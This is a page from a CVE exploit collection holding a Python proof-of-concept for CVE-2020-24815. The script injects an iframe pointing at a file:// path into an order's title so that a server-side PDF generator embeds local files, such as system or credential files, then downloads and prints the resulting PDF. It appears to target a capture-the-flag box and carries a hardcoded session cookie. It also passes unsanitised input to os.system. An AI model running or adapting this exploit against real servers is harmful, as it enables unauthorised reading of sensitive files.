4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-24815
README.md
Rendering markdown...
POC / exploit-CVE-2020-24815.py PY
⬇ Raw GitHub ✕ Close 
import requests                                                                                                                                   
import json
import os
import pdftotext

url = input('enter the url: ')
file = input('the file do you want to read: ')
json_params = {"basket":[{"_id":"638f116eeb060210cbd83a93","title":"<iframe src=file:////{}>".format(file),"description":"It\'s toilet paper.","image":"toilet-paper.jpg","price":0.69,"currentStock":4212,"__v":0,"amount":1},{"_id":"638f116eeb060210cbd83a91","title":"Axe","description":"It\'s an axe.","image":"axe.jpg","price":12,"currentStock":21,"__v":0,"amount":2}]}
post_req = requests.post(url=url,json=json_params,cookies={"connect.sid":"s%3AqSqCRLkjoWkgwJicp71QB-1BHRFxyNQg.aDgroet7rEX0%2B8Xg6CPJguaAOlqNIjqJQwcsWeUUL7c"})
response = json.loads(post_req.text)
id = response["orderId"]
urll = input('enter url without directory Ex: http://dev.stocker.htb/ -> ')
org_url = urll + "api/po/" + id
os.system("curl {} -o test.pdf".format(org_url))
with open("test.pdf", "rb") as f:
    pdf = pdftotext.PDF(f)
print(pdf)
os.system('rm ./test.pdf')